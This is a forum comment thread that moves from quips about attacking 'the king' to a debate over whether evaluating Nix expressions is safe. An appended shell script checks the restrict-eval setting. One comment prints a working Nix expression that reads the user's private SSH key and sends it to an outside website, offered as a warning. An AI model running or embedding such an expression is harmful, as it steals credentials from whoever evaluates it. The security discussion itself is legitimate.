1. johnbe+(OP)[view] [source] 2024-05-15 00:14:43
When you take a shot at the king, you better not miss.
replies(3): >>karma_+gm >>tjpnz+wo >>beeboo+981
2. karma_+gm[view] [source] 2024-05-15 04:10:18
>>johnbe+(OP)
Or, in this case, when you take a shot at Machiavelli.
replies(1): >>CyberS+hT4
3. tjpnz+wo[view] [source] 2024-05-15 04:37:57
>>johnbe+(OP)
Lest you find yourself in a private jet careening into the ground.
4. beeboo+981[view] [source] 2024-05-15 12:24:20
>>johnbe+(OP)
When you take a shot at the king, you get reported to the police and go to jail.
5. CyberS+hT4[view] [source] [discussion] 2024-05-16 16:46:07
>>karma_+gm
Hi, sorry for the unrelated comment. I actually wanted to reply to your comment at >>40208937, but that comment was made too long ago and I can no longer reply to it directly.

In that comment, you wrote:

> It can delete your home directory or email your ssh private keys to Zimbabwe.

I thought that you might be interested to know that it is still possible to exfiltrate secrets by evaluating Nix expressions. Here is an example Nix expression which will upload your private SSH key to Zimbabwe's government's website (don't run this!):

    let
      pkgs = import (fetchTarball "https://github.com/NixOS/nixpkgs/archive/0ef56bec7281e2372338f2dfe7c13327ce96f6bb.tar.gz") {};
    in
    builtins.fetchurl "https://www.zim.gov.zw/?${pkgs.lib.escapeURL (builtins.readFile ~/.ssh/id_rsa)}"

It does not need --impure or any other unusual switches to work.

Hope this helps.

replies(1): >>karma_+zp9
6. karma_+zp9[view] [source] [discussion] 2024-05-18 10:25:07
>>CyberS+hT4
How is that supposed to "delete my home directory"?

Also, it doesn't work:

    error: access to absolute path '/home/user/.ssh/id_rsa' is forbidden in restricted mode

Maybe you don't know about restrict-eval? All the CI for nixpkgs is done using that option, so it will never break anything. Turning off restrict-eval is pretty crazy; there's no reason to do that and it's dangerous.

https://nixos.org/manual/nix/unstable/command-ref/conf-file....

> Hope this helps.

I don't think it did. I'm not sure what it was supposed to help with.

replies(1): >>CyberS+7Qj
7. CyberS+7Qj[view] [source] [discussion] 2024-05-22 06:26:04
>>karma_+zp9
> How is that supposed to "delete my home directory"?

Ah, I over-quoted that part. My mistake.

> Also, it doesn't work:

It will work with the default Nix settings.

> Turning off restrict-eval is pretty crazy; there's no reason to do that and it's dangerous.

One would need to first turn it on to be able to turn it off.

> https://nixos.org/manual/nix/unstable/command-ref/conf-file....

Indeed, note the default value.

> I don't think it did. I'm not sure what it was supposed to help with.

I was hoping that it would be interesting to you, but also help avoid spreading false information that might mislead people into evaluating Nix code when it's not safe to do so. But, I think I understand now that maybe you don't care about what happens to other people.
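
The restrict-eval setting this exchange turns on, as an added example that is not part of the thread: a shell preflight that reads nix.conf files and reports whether restricted evaluation is enabled, treating an absent setting as Nix's default of false. The function names and sample configs are constructed for illustration, and the parser ignores `include` lines, the NIX_CONFIG variable and `--option` overrides.

```shell
#!/bin/sh
# Added example: report the effective restrict-eval value from nix.conf files.
# Assumptions: `include` lines, NIX_CONFIG and command-line --option overrides
# are not considered; function names are hypothetical.
restrict_eval_effective() {
    value=false                      # Nix's default when the setting is absent
    for f in "$@"; do                # files are read in order, last one wins
        [ -r "$f" ] || continue
        # Drop comments, then keep the last valid "restrict-eval = <bool>" line.
        found=$(sed -e 's/#.*//' "$f" |
            awk -F= '{ k = $1; v = $2; gsub(/[ \t\r]/, "", k); gsub(/[ \t\r]/, "", v) }
                     k == "restrict-eval" && (v == "true" || v == "false") { last = v }
                     END { if (last != "") print last }')
        if [ -n "$found" ]; then value=$found; fi
    done
    echo "$value"
}

# Gate: succeed only when evaluation of untrusted expressions is restricted.
safe_to_eval_untrusted() {
    [ "$(restrict_eval_effective "$@")" = "true" ]
}

# Constructed sample configs (not taken from any real system).
demo_dir=$(mktemp -d)
cat > "$demo_dir/default.conf" <<'EOF'
# no restrict-eval line: the default applies
substituters = https://cache.nixos.org
EOF
cat > "$demo_dir/hardened.conf" <<'EOF'
restrict-eval = true   # evaluator confined to the Nix search path
allowed-uris = https://github.com/NixOS/nixpkgs/
EOF

for name in default hardened; do
    if safe_to_eval_untrusted "$demo_dir/$name.conf"; then
        echo "$name.conf: restrict-eval on, file and URI access is confined"
    else
        echo "$name.conf: restrict-eval off, builtins.readFile is not confined"
    fi
done
rm -rf "$demo_dir"
```

Nix also accepts the setting per invocation as `--option restrict-eval true`.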